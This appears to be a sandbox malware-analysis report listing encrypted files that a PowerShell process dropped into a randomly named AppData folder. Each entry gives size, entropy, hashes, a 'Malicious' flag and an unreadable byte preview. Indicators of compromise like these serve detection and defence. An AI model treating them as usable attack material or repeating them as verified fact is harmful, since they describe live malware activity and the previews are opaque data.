                                                                                                    SHA1:704F876DF7318200B397E0EBB2CCDAA06E0C49D0
                                                                                                    SHA-256:47186F3C82D9657DFD535D8B1969ADB22896FD2CEB0882FD4B258C7741D11025
                                                                                                    SHA-512:64445724F71DBF96226AF6C790F9E79DCD4170921C84ACC593AE94F8580A0DC28C0E186EE49585E4D9AF1FF54BF6580E1151C981AFDA30B98799A430F12CFED6
                                                                                                    Malicious:true
                                                                                                    Preview: Y1"Y..:..1t.-w$....4.......Z6......b........~...N....Sx..x.8fb\.X%db.R>.G.]....J<....._.JDXL....E.pXAc....?..o......zL.[..b.....>..;..t..I..`h9.......L.....8...X..#]..Y.|.;..........l......../.......5.w....h.?.?.....L.....k....EIs......|...jB..M.9.4..rf......@...L.i...#.CI...W..L../.(.y...q..U...W...O.....D..6.89...}.Ay:......}j...T..4.)s.....1..A..F..x.....j..nv..Tl.O.I.......)..hese.........v..9S...~..............:X....,P..a!...T.a..f.....D..z.q.K......x..#N....O..O1.>.t...=!..v...?..CH......7w..T\.}.R....~.y^..m........G...\*z....."..!./r+.}O. ...{U..v>....la.kPK.#..['....>..b....R.i0x.'I.....*.....7y.z..%l:h...>.ou..0.3.7G...:~.L....3.?SZ................C...X..jW.e..B.x.sG..ORp\X!.....m...O@.....Q+........m.:...._..S"R.).q[...DgfL.....8...........r*.`..48:N......t..U'X.oMn..C...q...4...<hz....)..-.....+sX.....?....P>......Y.~....W...8o...g..+.2n..HXD.@...j..N-.>p..G.... .!...W....i.\Ff...4......Z...T.#..k.....A1"?.`...B..G...A(.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BzlrQyfGXeaJn.HjqzEcSRlsvfuZF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171466
                                                                                                    Entropy (8bit):7.99895675675713
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZWAuVNBktqMND+MQuqzQmSgQ1XE8+CeyfTCmbp6YUgS+qLG9ALotWsxDVkELh2/2:bhfinDz+K8+lp3nLU9hLo2
                                                                                                    MD5:13577DB605C65AFDA2369FCAEF6978A9
                                                                                                    SHA1:9192C640CD5EE62CBB421E5019379B3B92E91536
                                                                                                    SHA-256:EA2EDA0B349853A51A8897F5725D4A450D5F21282855C0FB19FF93503C32F209
                                                                                                    SHA-512:D88A0B4C2D708C1C156E9F117960D5EAF2B8592E9960306F599D81EBF4CD76B624EC84E88CF152D3E6DC75D93EF224F8B5F7A34E8D5F01A89056C1203D80F6BA
                                                                                                    Malicious:true
                                                                                                    Preview: qgV.;.....p..c..z...Zra..!'.N.m...M.....t..p7.1$...D.k.Y.F.O......y.!.F.....R*W....g.L.....m..&..k...<..H.%.I.D...B....z...(N^.....B.;...;,....Iy. .._...Gz...!.yu+..\.*/....xX..wy...*.).8/.R,.D.&...!....F.3..q....K..h..2~.N.p1......>....ZI....~.|?P...}.%........K..Kr@g0...2.WC.m.e.....H....-.|.2*....V%Mr.,..e. E....$8.....o!N..,.3h:..r.r...' ......j....v2.....9....)....]...%.^q..%5Se.li@.e...)...M`.......{.l.....wE#..._..^.e.|t$..*.q..U.3..r...go..)...E..4z...9H9n.1'.F.=.Y............#J.....D.}*zO.6H._[b......A.jN&...z.{.=_.+..P..e.o...u...6"{....S.+O...i%..q.WC.....u.Q9..D..[4..8..w...5...;...9.(..,........cY.Y...CEB.oz.....XR..3..xZ..b...(....zM.w.......L.^&.X}..x....'.......L.Y.d.J.b.......s}.W.$.4.....Gb....._....y.D..E.h(."..d5.0..N..W6....Ui...>@.<5.j...?..../..J.....s...(`.l&.c.........I..&\..tV..=GPc....wa.a:F.f.....!*D...M..@........AU.....I|Z.jZ%&.q).8.~.....y.......AW.....{uuw\Yxa..U..VY)hN'c.s.l.Y..i.2.....'n..4.}......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CSlvxtifgyNDuO.JZixNhldfnGusteFKL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69468
                                                                                                    Entropy (8bit):7.997141231255981
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:QVAHnHMqdq9e0AxpJ2lkEYTBq4BrTdVGJOPvLApxSnuZsKzkTlvh:TnHXdtJhEifBrhIsXLApQniFzwlvh
                                                                                                    MD5:ECAA53E175F88D3E90BB4E97849CC264
                                                                                                    SHA1:DC819FC4CCFEBA04AC3B9D7744EA72C109B742D3
                                                                                                    SHA-256:DBBF3E366ED30C9C2A4DAC40EDBD2F713F20BEA11FCA1C60A84A202F3FE620C9
                                                                                                    SHA-512:A85DFAEBEB88B4EDFAEE4AD4F51FED95269BB4F951287FB76118B3021E09FC94FD2ECB71F84A7CF348501E95B9A8D2933C59F5DFF2516C6FC3B99044D9C3EA35
                                                                                                    Malicious:true
                                                                                                    Preview: ..s.....(.]..$..K.l>.D:.~..m^ExC.K.0.p..4.....*I+.{..E.9.E.J:H.].......0.C.0..}S.#2...&....*`U..1;... `..K.E.i...-...*`......v...e..Qf......H.^Db3.......I.m#.{m."i3E?.^S."...ou..M.......y..U..5A.&.+.#X2W..+.....m...\q.......y..H.h.*C....^Sn..|.SV.2.;.;\..Y...#.Vp....kk\IpW....".~..z..&-M..K.[....._.8.....6...n..<...D=.....~u..h........CM.O........ .!....Kcs.&........F....{..4..k........P.@].w.. .....f.__p?.....>.......n.p..tO3.9."..1...yD?[VH.9...........{. .C.6.r...Z.~//..C;t(..$_.'i;.'.Y9.o.....F.#.t_.p7...w....Jh..3C9E3.uuxul..J.rq..`....V.R.;.{...Q.T@.e..9?...cX._(jDD..n\:v..%.."..si../.mV...@.v..&e.1..I@s..h.;#.-........b........8....|Y.&3n.Kg......C:^|+.H.....A.:.-.%.gF..^S@)..k......iX.3N.E(...,.. .h../...1.uy..._.....b.t...'J.7..%UK.i....PQ.k.~..Op0)...!!.+.b..\.y!....W#..S.!..kZ..+.|s.......M`.]!.S......}._..)Eg..7....r4...C.m.r..VZ..h%}<D........S._R...:..%."_........s<.= ...X.....,O]B R.t.T.....`.#.....y=<N*n@j..~.\@.V...L.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CujBDfrFwxaX.blogVMOPHDtKfWIGyN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79034
                                                                                                    Entropy (8bit):7.997471768655562
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:O/ZzZA6R5Sk3+DA+AKt9czMc+x8OYOeSMk51qPvfnu7PplRgLxifO:YZvSMGW7+q8eStXY3nEplekfO
                                                                                                    MD5:4EBAB280B35D93F3338747526196A0AF
                                                                                                    SHA1:F1A276D36D5C7C999DA8DE704039C4DBFE3198F4
                                                                                                    SHA-256:DBF9443EDD9486B8EB05B9162BA6F1D8CB57C172BB7F7C95AA649CCA2AA4F9F4
                                                                                                    SHA-512:D5A3270BBF04516D00CFE3CF3491A0D9A46B2CC50FD8773AE5C8456AD9D48DBE07DD66A81CAF9E80715BFFC16E34FDC6E5D6F5E0E180CBA28AF6B55B92B465A9
                                                                                                    Malicious:true
                                                                                                    Preview: ...C.b...b+.}k.#.....(.o..z.O.......{.$.C......K.v.}Y...D.......V...u..8.X.e&.VO...z.6.gUF.M.....k.BX]z.. ;.#.J.Z.8.I. w@./CG .{......D"^.|..Dv.....G..e...KP...).N.1.b..C.o$..K...c...;.I....||.&(.P#[,....@?.O.....R_H.~A..?5....#.ot..I.1*r..Y,~...p.......N....vG+..........7.......X.C<..0...$..|-.^TL.g!.:..c;.....9.`..du...1.B..X.....{....).....vCE-.S.XYg.......D.+Ml_..LLN....,.DV{6....OA.AO..P._K...19.....+|..aBne.....i:..G....j.J.C....#..l....YV.-.......)d...*..q!f....5.C...mb(.W.....O........o8.g..#...!.].a....utm.7vP..*... \5rtt9._3...H.:...e...|......K....\z...A.....f..M...`kT..mU.._.F...7 .N......=|...3.V.e.-.7..R-.._T...sl.K=.o..b.).,"...w?....C..4..'..A.p..^^..........?...U..xD;.;:D.Wl......o:A@...w.-...[/.`...M.n...`..r....vU.Zvl....SA..=.I...j...z.,ms#^.......x...`GE6dWs(g....l...WUL...F.c.C.Xj.tk`tDF..K.....P.e..>4.vR..M...O`..p..,.{.Z.-N.a.....,.....T...flE...1.9.;...H..7.....(.).=c..C....Q..i..ep...'...+_........u...5...<...b.YyU.|.....:.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DUziVQlMtBASd.PcgpHaRTfDKrVzU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):167042
                                                                                                    Entropy (8bit):7.998991422851515
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:kyd/p9ShhMeIkBPm6BRim3Qyi4KwOW1AIFJaH2oGIttc:ky0aCBP1Rim3QiilIFJsNXs
                                                                                                    MD5:DD83CF1C97AAC05D3B692469DDAC3B4D
                                                                                                    SHA1:BADD92F9A1DBF5F43AF2E9455DF7A34537FFA522
                                                                                                    SHA-256:3E6C357F966FCD1783E6BB0C6F4387430D93C97AB31241ABB240B65A1D443A65
                                                                                                    SHA-512:3A6696023F2F9B75D962B400570087154E8899DD4E3CAEAA26E7857CB992E685288FAC48361025CDA3BED792F8456D84867C0282FD63A9EFD356B1A157FC1BA8
                                                                                                    Malicious:true
                                                                                                    Preview: }..eg.kI`f.......].......P1...3|..gW.q.kb.#DoNu.,.Jr.w>......;..C>....9.h(.`7......."...U....y+..E&+..AOj.a..\..Eb.p..q....Z1........&..`.3.<c..].o.......p.8pz.&X.o{...H..=...C{..wP.>..8a.!.'c.I...o...2.w...-zd..~'...Br=.ik}.7..?....tS.CR(...d.....m.wN.A.1... .nq.....SR..c.....l...@Tg.U.E._O...P.....w...U<.p'mQe.-.`z...B.....W.,........(.7.T..3.&.V...,A.-....cdM......T.G$9..4..D.[pl.b.< ..c.^Vg{5.....i.".. 6}WHG=.~.R.Q.>..H.@.{FM.....F.:..B.=...>.J..`h.c.N..../..|.7...K..A.:...1=."J.]..#tg1...2x....>...a......s...J..f?......3n..A....X.]..K.[.x*.q.-......^.u>..J.T..Y.k.e.!HS....C.~Lf.,.....V.Y.Z.&.e...v.H`.G.PI....L...k...{..G.d....n.5s.y8.\......!.............].)#...,.[.3V.>`..x.n..U&2....5.u_......k..P..Ke.p.!i.9p............b.....K'..q./.a..HX&.....T..R.+l....rR..HX.h.X..]/.......?.GR.Fy,.....>8E......+h.../J....8...!.,Y,.Hg..."6q%.l...YJ..M.I.ed.E..y .y...!.4.(.^l.ml...../..Q9...HvF.......7?.Z$....a.l.K.l3?..~.Y.aeg.z]WPL.D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DYfgibnQrxLj.hOuIyCYPmXAGUjqLak
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):176065
                                                                                                    Entropy (8bit):7.998960229758436
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1QQgCgmES3Zy89qXxmwVvPlOdd2jk6n2978ROEG4x38KMTEIl4vgri77aRHpUwUJ:iQHxRZy89qXxmGlOdd2jk6U80VKMTEIA
                                                                                                    MD5:192345DEC2020B306350FE75C379BF13
                                                                                                    SHA1:0E896B50B284774F26D5CC138D7CF044653EA0B1
                                                                                                    SHA-256:32B2C5E6CB21EC3F0E2B340F2135FC45F553AD03FA138F1B21CE68A626AF3F81
                                                                                                    SHA-512:4F108C9F970F0FAD80E0403A5FAEF0A26833604B31118AE9B035BD484BC320D91AA434F11F84E1E1F27E46C02F25047CCD5F639AF1FD85480352A9729801BB24
                                                                                                    Malicious:true
                                                                                                    Preview: ......D../.I.!.@.W..l.Z89n.Y.1..}g. }~....Z...Dn!.......[.u..........&`>..pn..r.:..."...h.....E.O.AX.l/....=....v...<. .6.eV..(..j...~.r...*.>..3.d...]7G6eJ0.q......6.7.q~....4s".....w..HC(.)i..)....,.XLTA.>1...{P.D...O..U...7.....xR"i...Q.6..D..C...8*...a.p.B......y..F....i.2Q...^..Zm.5...J6O.F._.7v.W....Ho.....ZU.J.w`..n.b."...o.....j...S..............;L..i*..SC~....uf..[2...X.x....yX`.aq.^.~L..|<...$....4.VQG.B.6.4 B...Z...Rq...{^V=m._q+.. }.j..D.\...<.&....u.|.E......w9]y.V[f...Y^......i.~...~.L2B.(.Z..j{?f...J".D%r........r...4..X=.<..UO....f..r&.q.4.......WY.......{.W}...E..,.tC@$.)p..]o..6..t.fj.#.....).i5tn...Ea....7[..1.C..QNBG.=....9.<Qr.....@..L3......L...#...*..g.Z*.>...w|.4.....H..&I ....A....,............&!....h...\.....~>.T.....9Q9`e........!.."W....[..."... .)o..{.....d....3.=S..F.U..........$.. ..DT......q....&.#...#jY..Ly...j#s.0.....5'..0. .2UM..1S...i..hf.%sb...c..}[..Y.e+.......;.4N_u.[.9?.YgF5.E..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DaBuFCXkip.xlpKmzwdQWNfPJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):70947
                                                                                                    Entropy (8bit):7.997277374747075
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFcQPizsRy8KtY8D3UdKi593M6Xn378WAZ4KK5Y/4giCq:HzizzTT3i5ZM67bG/jD6
                                                                                                    MD5:FC38683C545EA3DAE91A85D4B3C2E41B
                                                                                                    SHA1:C082C436D1C5F84930265AD1F8662E75F3946409
                                                                                                    SHA-256:530AE1B241BAA913B6B9E8D86C63AF2A91FB24E60E2099B4BA20DFEEFA81023A
                                                                                                    SHA-512:7DD766714C2C1B7EAF271D697D8772A97CEF1212E08EDB88890D3BB780A60D8159F92F9E5B7309395FCEE26D21AAB7F309B3195FC533FB5C07F76DFE3A451AD4
                                                                                                    Malicious:true
                                                                                                    Preview: ...D............$G.?.v.U.....0iX....[5>..JbA_..$.h...>.<..u...A...*....,?..2#.CO...._.+....6@...)..o.n...\....n...%+.......(...}..ep.@l.....'?...hiw...q.q.~;pM-........}..~.....fH..xU.b.....S.C5..z..].d.....8....l.RnQ.=...q*...pB..i.d..o.3.....9..4R)lmOuLF.;.L...>.?..K.n.......2<..X.f....)5p.lE.M..S....~.Z.-M...Z.....X...E".g..sT...J.p.f.y....._.s..]...+.9..ok_..hQ.i=.9$.N.k...G.N8.......7I.`.}t.B.Hl5.d8r...4..k..'..:.KSp.q'@^.mWN.%.*p.0r.^...G..V..{.. .t.Jc...G=l...a.....2).O.T.....6.....t..Q....YB...4C.A....t.jt...pe...V...N.b..9......X@..!...?.....4...>.O..b.sj.....p..5.....D.5a..-._.+.uH..pr.U5C?1V.F....A.n.-@.e..| .w.v.w--.........\Ki.D.k../.<.G......&0.q.}m.*5..`..7:......l..D9fP,3.5..wb>.m^f...8...x.:2mJ...j83+....+.r..p./Z.._3.~.......rJ.92......A(..............c..L....'...S.DU8@_.....eP.......f...!.......iW..'?...~'K.i.f,.l/..y&....+]..."-......]...Js..${....u..0.S..Fs....5g..;H..}....*.YO.qg..-..1.\..u._F.@.fb..j.X..z..$....#:.?
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DcJKGzsLoUHwdX.RENXkbpjPcdVDF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96119
                                                                                                    Entropy (8bit):7.998227048146325
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:wJpPjE4RXn6EVJPgQKiP8uonTohojJHalQhokhWi+xp/wovekffvo6Aa:APQgXhHVPPo/JHvhP1ovekfY6f
                                                                                                    MD5:D8A93D2245198624FA1618368F72FF4D
                                                                                                    SHA1:B4375A4DB9410A7AEB3C25438545B7CD3BD3D6F2
                                                                                                    SHA-256:7298BD3DA374B883EEA2F86E41A9269F451DC49968D58F2CF7894D6B65ABD438
                                                                                                    SHA-512:B67C7732F8C60319A9E2B6AD621E079A93E0FBE447F12A8973A514D29A9AC50CA0A70563740BB4756C8CEDEE7A6AE7EB2313772F59B9E1A4004C8A8E4D770510
                                                                                                    Malicious:true
                                                                                                    Preview: .%m)........Au.t.o.. ..*..7...].....>/B...#...q.`...].UCU?...]E...r..1.nJ..5D.~S\..[.....V.Dj...U..m..>..5<...n...*>-(..p1eP.....F..C...ol.bc....D..s.,R..h..>..>....^..H..M...-eh.....v.,'.;.-..#.P;..3.....7..;@.... .=*.6.-.M.1.mD.*o...jh....R......=..6...Wz.-..^...p.. .p....R..}k...9Nv4.....W....i.<.h...x.g........L...c....-mdgp..y.bzB...t.._..'....T=`.:.K..1?.....$....a..K..Ef=..6.9<p.@87v.B...Xd..3....Mo.+..0.|.x..G..?....+.0.j:....G.....1E..H....`n.....T[.P%......Y..*..C .........G2M...g..3......... A.. .`..nwA.R...,.........E..R..?.)....t[?pE......||..f.6.^v.%...w..O...x..c..Jm.%=..9....LM......?..N..|....'....8...5.N.....!F.[..!....83..8D.*1&J..........p.......+._....so$.|..IK,1S.D.Xq6..-..{j...`F...eY..5..a.a.}rQ.6.X..)E.ll&_....k.QR.gy;..@m6....9bY..!...#r.".{.\c] .........m..|...v.y2jD.+.%.....?....:.H...g.GE._.......#A...V.=..E....J...N..A/...C.Zy....7..)...U.......U.2e.&..c<I..r...=...C....#.;.uu..:.c......S\....Bo.(.!.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DkxNFlieKuHW.CqBZlQiGyMYmR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):183935
                                                                                                    Entropy (8bit):7.998878091429768
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:LLKAdKwLhp6lKb3BYUMTbClHxscHXg0SqfbfL3cORvgAHV7YlLsLlZEj0U/XAAZS:LLnlLnhBYxTXOxLhgApY9spZC0UvZJER
                                                                                                    MD5:73E1365DF09F94618C065C42D61CD7CA
                                                                                                    SHA1:0DB5B1A1C7E738B8F958F8904DA8B7321E6B3924
                                                                                                    SHA-256:44B10F2B36282E4B5B7B5AA1800AA51BBC8DD3BE96B47E0AD0633555E9DD9BBC
                                                                                                    SHA-512:242E098D3F54D8A07B1BD4E541DD609B15DC791CCC552153CF35F0113ABD7C9AE67C5FFD639F20ACEEC895408295017C70B5AF579432F2B582BD6AF27B0573AA
                                                                                                    Malicious:true
                                                                                                    Preview: y&..)R#y....l...[m Rv.....%".j.d.&..?...D,..z^.nJ..kg.'..,-..>.@.F.>...B.2.'.....c.....Kp9.t..x....../...p.5..E...MhR.....yHX.........=.?.8p....l..h&,..a.e...{f.<......P..k].Aq.q....X..#..ra...~...*.r...<....$0Q..TLY.....=*.....7.b.6....c....B.a<}1^e....I..4..%....rL..........p..S.A9$...M.!......!.w.......xW....8(......E...i._..DY....Z.!.....+..<3....rN....(=V.....E......5:U>fu.m%o........./5.&....P....U.G%.p.1..z.Az.3......w....X.c...ueT.{.....(.{....C..Q./..x\.......I..A..ln.Eq..sh#.$R$A.`>..^..u.>y...c....j....ff..u...).e`,....SyV..l...`!..8..Bv6....qH....\4N.+c{..[!.Z..3.h.....;...W...m+.Z..o.;.r.(.j\.>ur..._.4~#.Bpc>..".D.."Z^...Z...H........&.O...uG...WP.V..Wf$6.t..C..~...,~4e....@*..Q.c'7.mQ...z.~..*..1.f.?..J.(../.z.._...=.v.e.KT....v.....:....O.*@..........jb..Y_....4$.p.....q.e....k...%.;bi....4d....j."Z.....g......._k..v. S<.....Z.Hv^.U>F].q a..X..}$.v...|JNtf$P9.A..-.!$.......M.#.t[....L....L.'.h..............B...W..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DpMsTegbJVc.gQhcHOMuET
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113727
                                                                                                    Entropy (8bit):7.9983178933061
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:El3Raj4KmqOVWGT6KQSESCp2pr9gIIgYQZAserT:c3R24KhOBpE6ZWIIgYQZAs8T
                                                                                                    MD5:28008A81A6E914E5F5D26481E84D210C
                                                                                                    SHA1:B10979DA6A5B51F2AEDDA6FD0A684539A0788FA9
                                                                                                    SHA-256:DDB88C5FD9C197D1517307C98FDA52C1EE77B87A364C0E9C8629991C7C653AAE
                                                                                                    SHA-512:5FF531DD27E91DE079A2AE0BABB7B70EFAEF916D622E6CC4972D2E18A3B02FB07616D01CCF6FFA8DD9D2B325FF95CD2176A8B6D090182FD7CEB1E5A5019820FD
                                                                                                    Malicious:true
                                                                                                    Preview: ...E......v......d...9:..d.kX.=. ..Z.E..z...%k..4[./..3.i3a:.%s....>.y..._.'6.=..6....=......U.?@g.....b.6.}X3G#.g.v...F<'..........V...]z.........f#-.d....P..[xap=....?[.:}.1g....V...j ..5....)B.N.....'.xQ...0._.q..h....dZ..DSH......l|0A.:.n..k:.%mA..:.1..6......IKuy.W7t.hy{_?%....E...<.......m........$..a.%...Mc.tr9...>.....rm...<\....."..D.V\..X.n.fD..........:.j^..U..|.[..Xb[.Up... h....&..3..B,...v.U..M....=...D.t>9.w....(.E.5..l.pHa0.w.+m..$....~.g.....$..Q..l.....l.L}.qB.*mGF%.....Z..+..Pmj..-..`....). j[U.sCg...K.'.b.`....(?.e.?+J.....w.9..)...>p.9.v.."%.-B....<.G..Q...M....%..6.0.U..w..5.om.%.+.X.B...qnrK.3...n".wL.6.........i.Y.4..u,#t.....R>.oZ.a=..]...e.rU{........5.HS.vb...N.e.....J.d%j.... ....Z...z4.J.$........st&`".^.I.H|J.]..}Q.aB...r(.........!M...Pq.=....o..1b.!..w...Z.;.|.y\.y.s7Y...X.~...~Aw.....k...8?.^0k.5...b%.-.]..>....B|_.r..a.fwJfV.P.O....bY.*.;..tB.]..!Y;.`f..I...vtm.Q....G..F..5..g#/n..`H.....r.L....e..N..|....'x..\.`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DtJjRnLMTbAholvw.CejnAUbatpqvxourYz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66645
                                                                                                    Entropy (8bit):7.997165133142922
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:IaJXXQ4b/QpbQ1ldWjZhNOtT+8BFcisoN/42wMI1XN9JBRbbqVf4tDrY5:tJXA4b/z1ldo/ctYT52IVN9Ru4+
                                                                                                    MD5:EF523BE29C869B2B48C0C647D7B79C1F
                                                                                                    SHA1:D1FF357FE9EFBF82D2E3DD5DC0D10DF2DDD1F4E8
                                                                                                    SHA-256:A977D6A442CF0FB86E1C9DA161A2A90D0B918D6D9414EC0A8437BF9C489CEE6B
                                                                                                    SHA-512:10EE7478E82A421501E35AE6EA78B31A5B3051F4145E2288170121748E6DFA79E2640EBB6B49674A38C8DEBA1EE98B5C348C51D391C00B00C91920F85C889D84
                                                                                                    Malicious:true
                                                                                                    Preview: ..f.7l.H..............e.9...r........uzS`.k_.O}Z1.........Hf.....fH.MH...J.....J.A/7.e..-.w......J..4..?p#..j..f........u.q.>....sc....\...NAg%.......Q.J.!sm1...q.....v....].a....v.A...LV..k.U..857#.g..O....../0...;.C.cQ.....`.Gg^Uo.._.....j.%.......n.....z!j....J....E~.n+d.Q6..K.{....{....x..L.N. ..[./...G....(].;.`.6...Ya.L...+1. .yJz.V..Y...D....Xq.95.j....,<.\Jk.....K....)kn....C*...ue|.....g.wWE.....5x.#.....@.OZ9L6...b.....+W..Z.L....Y$#...'.X...g....L..\]6.....v.PXv..D ...m.8.A.I._E....iO.zx.O......K.-.h.O...j..,./.rz..........1.....1(}.x.@..n.2`..'..p...Qd.T.}...-&...mt.K.J~..G..w.u...),.......c.....$X......Th.......]e.a.J...N..Yj.......:.'...h..........E.(?9.i.4c..E.......`.|.o....*....\e....-.....Er.'.......l....8>...Nj..........m..2.N..d.$6-3.,WN..h#."f..e9....L.i..V./...[..~.....I)a.....j..A...(R.W.w:.@.B..T...2.@.8R..>..K....VS..3..V ...O....9.El...=.8....+.d.p'...w.u.Fi.d..x~.9.J.iU7+.?xm..r.e.........QO..p.c..l.F%m.V.Q.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DwYnKPqzdQp.EbGeJrITVZy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):173441
                                                                                                    Entropy (8bit):7.998896821206543
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:QaCMq9vgTyje7g9l6MIKJHC7SRO+j1CpM/W3vpdFswzTMyv9PdwwFEkJodcGHZY0:Q94TyjFHTIKJHLP1yZ58ybwwFPodt5n
                                                                                                    MD5:2FF58FCB1D90AA9E8EA90927A32DA4DA
                                                                                                    SHA1:F138C306932E904AA3E499C46288BCA7096E1A50
                                                                                                    SHA-256:14ED350FEE88A26FE790281981C7EDA63C43767CEA3218129CE237466E04876F
                                                                                                    SHA-512:6E7B523981CEAB3DBDDACAC0E6A7FE132ED82B7CF2BD6951F0D081F527EF669446FB708CD5E3ED2B9D7EC522CFC7E275BBAE30D59491365515542C060452105B
                                                                                                    Malicious:true
                                                                                                    Preview: .O.]....../LH....26..:....#...m....U.^..v.kP....(.98I..a..;..w*.<q.f#`(.O..H..Z.4|........eA.6R......;.|.'.;..........X.....2.m...$.F.8.T.#.....+....*..&..1.....h s...$5 ...j.7.C9.m'..3O#.v.u...$..(......)..Zu>M.8...;.s...A.g..^v]..8..f..D\:..'....E.a.rw.a../.g...1r..ux../2T...cO.L1.(g..'"G..W.W..........@"..8D.j..Y....R1...=....M..d.`.. b......_*.r.J.h...%3.Fr.vlM.+.%..."...dWCU...Qd.NY5...W.CgvmW.4B...Zy.@......$..S....Z._t..U .+.w.N..s....G..Re.c........M....Z...6..?......".-.....xH/.7%@4b.Jc..h...OeK....2+.....N.5.....y.|...})......X|"...+..7B.0o...*6..Dp{...;.c.$.8.{.M....o..v.!.n....L@.Ft.k..z......1....t.....;'......y.<..{|.M2:X...g.....s,..}.j..B.A....y"x.....7.xZ&@.......!.K{....r....T.E.K..M..nc.P;pRWu..V..#.F ....=..VA.s...~....;.. ..Oy.....d.C...&.c./...L.9....pf./.."...wF...T.z..tt.i,&W..7X1.9..7\u ..5!..75l..3..0bF...m..w...fR...b...b.a."|.%%...Nw.f......'...^........K3PR...]........._?9.?.T1S..q.....g..k..ns.U;.....{[
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EIgMSfpHlbtdkq.DshtyfZQgnB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):198804
                                                                                                    Entropy (8bit):7.998967842640802
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:SN6F/astw79Kk2v7F8SGHnusxSOr6ArNuB8f0SiRTOwAMiQ9w40+exg:Sa/astw7UbFZgG5v1OU2Xi
                                                                                                    MD5:13D14726C40CEE624F3E6C81C2DADB56
                                                                                                    SHA1:A7A4CACCA1AA25ECA591D8C3CAA9B78250EC180E
                                                                                                    SHA-256:3E9B54A4345E5732C37A771D817B67D6ADA25DBA58095832575D017AFBF8D991
                                                                                                    SHA-512:A684DAEA70D74831965754C9A78AF8B59A1F9273EDFC632EA2C1769CED696D9A256CFB58544D498643D016A68558401BD4811E8B0488D94DEB5181C3E99B0464
                                                                                                    Malicious:true
                                                                                                    Preview: .sJ_.C0ls...r.....Z..O.eE...SS..|...b.<./..".k.,c...".h..A'}. aU...oEO....FB^+..&....H%}.....b...`A..6..e.!...v|.1..k..J.......v..P.?...j3....:5.d..ga...I...u.=,0.%..V..F.F........`#... ..<..!....x*..d....2F.1.as7..Gr....t.Rm.=k.m........J..........I*..0.....x.1....z.ib...Z.-..QF.......n.[...]......o.'..@....'.W........J...H.9.C]wj...#.^s..j.+.Nu...G.x.d.Q...j.'.>...PM......h........d:..VQ..(.....d_.*.....!W....s21.kXAAd...r...4...........(t...._....<.(U.m..%...r...O.......7.....,d.*...'F.4..t.+e..*I.c..#`Q.v3JH@.p.ZF.w.37..H.N..9V?Rxt...Ic^..\,.<. *.Es./..........v..V`..v$.5..MY.|T..H......@.h#...A.._;.MW Ry(.R..<M.c.^.82.....0.`...ld=J..{..0....H...v.R-.'o.Y".....[.......0yl..E.....1.3?...;}Y...B4*._.}...!.31.Dy:...y.'.#.<.....L....KM.B.....@.....'.<..<.@....+.}.)....b7...........%.b.>L...\.._.eD.QlbF.F..C.........te3.........1.L_Y.+.....{d......./.6.4...?..-McLa9}..._......?.*q.)..H..o=.N..z..,."B..V.....}.V#.7.........._bp'.g....
